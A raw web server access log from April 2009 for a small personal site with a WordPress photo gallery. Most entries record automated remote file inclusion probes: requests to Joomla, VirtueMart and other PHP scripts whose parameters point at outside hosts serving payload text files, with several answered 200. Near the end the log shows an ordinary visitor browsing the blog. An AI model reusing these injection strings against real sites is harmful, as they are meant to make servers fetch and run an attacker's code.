83.138.168.158 - - [02/Apr/2009:09:10:48 -0700] "GET /logs//administrator/components/com_virtuemart/languages/shop/english.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:10:48 -0700] "GET /administrator/components/com_virtuemart/languages/shop/english.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:10:53 -0700] "GET /logs/access_080905.log//administrator/components/com_virtuemart/languages/shop/english.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.101 - - [02/Apr/2009:09:11:21 -0700] "GET /logs/access_080129.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.101 - - [02/Apr/2009:09:11:21 -0700] "GET /logs/access_071228.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:11:24 -0700] "GET /logs/access_090212.log/index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:27 -0700] "GET /atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:27 -0700] "GET /logs//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:27 -0700] "GET /logs/access_080903.log%20%20//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:11:30 -0700] "GET /logs/index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:30 -0700] "GET /logs/access_080713.log%20%20//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:11:35 -0700] "GET /logs/index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:35 -0700] "GET /logs/access_080903.log//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:35 -0700] "GET /logs/access_080713.log//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:35 -0700] "GET /logs//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:11:37 -0700] "GET /logs/access_080510.log/index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:11:37 -0700] "GET /index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 65555 "-" "libwww-perl/5.803" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:11:37 -0700] "GET /index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 65555 "-" "libwww-perl/5.803" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:11:38 -0700] "GET /atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:11:40 -0700] "GET /logs/access_080510.log/index.php?meio.php=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:12:21 -0700] "GET /logs/access_080624.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:12:21 -0700] "GET /logs/access_080425.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:12:23 -0700] "GET /logs/access_080425.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:12:23 -0700] "GET /logs/access_080624.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.237.184.86 - - [02/Apr/2009:09:12:23 -0700] "GET /logs/?sourcedir=http://spk-wellness.de/smile.gif? HTTP/1.1" 200 93470 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.96.24.66 - - [02/Apr/2009:09:12:34 -0700] "GET /logs/access_080129.log/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.96.24.66 - - [02/Apr/2009:09:12:34 -0700] "GET /logs/access_071228.log/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.96.24.66 - - [02/Apr/2009:09:12:35 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
220.133.40.130 - - [02/Apr/2009:09:12:56 -0700] "GET /logs/access_071228.log/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.133.40.130 - - [02/Apr/2009:09:12:57 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
220.133.40.130 - - [02/Apr/2009:09:12:57 -0700] "GET /logs/access_080129.log/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.237.184.86 - - [02/Apr/2009:09:13:12 -0700] "GET /?sourcedir=http://spk-wellness.de/smile.gif? HTTP/1.1" 200 65555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
195.96.24.66 - - [02/Apr/2009:09:13:48 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.0" 200 65536 "-" "Mozilla/5.0" "www.dmulk.com"
220.133.40.130 - - [02/Apr/2009:09:13:51 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [02/Apr/2009:09:14:41 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [02/Apr/2009:09:14:41 -0700] "GET /logs/access_071218.log%20%20//classes/adodbt/sql.php?classes_dir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [02/Apr/2009:09:14:41 -0700] "GET /logs/access_080911.log%20%20//classes/adodbt/sql.php?classes_dir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [02/Apr/2009:09:14:41 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:14:43 -0700] "GET /index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:14:43 -0700] "GET /logs/index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:14:43 -0700] "GET /logs/access_080409.log/index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:14:44 -0700] "GET /logs/access_080409.log/index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:14:44 -0700] "GET /logs/index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:14:44 -0700] "GET /index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:14:50 -0700] "GET /logs/index.php3?page=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:14:50 -0700] "GET /index.php3?page=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:14:57 -0700] "GET /logs/access_090105.log%20%20/index.php3?page=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.97.120 - - [02/Apr/2009:09:15:00 -0700] "GET /logs/access_080905.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:15:02 -0700] "GET /logs/access_081011.log/index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:15:06 -0700] "GET /logs/access_081011.log/index1.php?page=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.40.97.120 - - [02/Apr/2009:09:15:09 -0700] "GET /logs/access_081113.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [02/Apr/2009:09:15:25 -0700] "GET /logs/access_080911.log//classes/adodbt/sql.php?classes_dir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [02/Apr/2009:09:15:25 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:16:20 -0700] "GET /index1.php?page=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:16:20 -0700] "GET /logs/index1.php?page=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:16:20 -0700] "GET /logs/access_080409.log/index1.php?page=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:16:21 -0700] "GET /logs/access_080905.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:16:21 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:16:21 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:16:26 -0700] "GET /logs/access_080713.log//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:16:26 -0700] "GET /logs/access_080903.log//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:16:42 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:16:42 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:16:42 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:16:42 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:16:44 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 200 106532 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:16:45 -0700] "GET /logs/access_090216.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:16:46 -0700] "GET /logs/access_090216.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.158.98.196 - - [02/Apr/2009:09:16:53 -0700] "GET /songinfo.php?commonpath=http://www.ydcommunity.com/board/skin/vote/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
218.158.98.196 - - [02/Apr/2009:09:16:53 -0700] "GET /logs//songinfo.php?commonpath=http://www.ydcommunity.com/board/skin/vote/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:17:01 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:17:01 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:02 -0700] "GET /xcnlhigafaabfooig.php HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:17:07 -0700] "GET /logs/access_080713.log%20%20//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:17:07 -0700] "GET /logs/access_080903.log%20%20//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:17:08 -0700] "GET /logs/access_080313.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:17:14 -0700] "GET /logs/access_080409.log%20%20/index1.php?page=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.94.179.42 - - [02/Apr/2009:09:17:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; Vagabondo/4.0Beta; webcrawler at wise-guys dot nl; http://webagent.wise-guys.nl/)" "www.dmulk.com"
82.94.179.42 - - [02/Apr/2009:09:17:18 -0700] "GET /logs/access_080214.log HTTP/1.0" 200 917504 "http://financieelgids.nl/search/administrator-components-com_chronocontact-excelwriter-Writer.php" "Mozilla/4.0 (compatible; Vagabondo/4.0Beta; webcrawler at wise-guys dot nl; http://webagent.wise-guys.nl/; http://www.wise-guys.nl/)" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:17:19 -0700] "GET /logs/access_081011.log%20%20/index1.php?page=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:17:25 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:17:25 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:17:25 -0700] "GET /logs/access_080905.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:17:26 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:17:26 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:17:26 -0700] "GET /logs/access_080905.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:17:48 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:48 -0700] "GET / HTTP/1.0" 200 105621 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:49 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.0" 200 5715 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:49 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 10174 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:50 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20081210 HTTP/1.0" 200 3864 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:50 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.6 HTTP/1.0" 200 31111 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:17:51 -0700] "GET /logs/access_080811.log//administrator/components/com_virtuemart/languages/shop/english.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:51 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.0" 200 12101 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:52 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/admin/js/swfobject.js?ver=2.1 HTTP/1.0" 200 9763 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:53 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_002.jpg HTTP/1.0" 200 440569 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:53 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_005.jpg HTTP/1.0" 200 482543 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:53 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_010-2.jpg HTTP/1.0" 200 750495 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:17:57 -0700] "GET /logs/access_080905.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:17:59 -0700] "GET /blog/wp-content/uploads/imagerotator.swf HTTP/1.0" 200 42753 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:18:01 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=5&722 HTTP/1.0" 200 3435 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:18:01 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=6&682 HTTP/1.0" 200 2255 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:18:02 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=9&962 HTTP/1.0" 200 1179 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:18:02 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=3&792 HTTP/1.0" 200 6273 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
220.133.40.130 - - [02/Apr/2009:09:18:03 -0700] "GET /logs/access_071228.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:18:03 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=4&759 HTTP/1.0" 200 157599 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
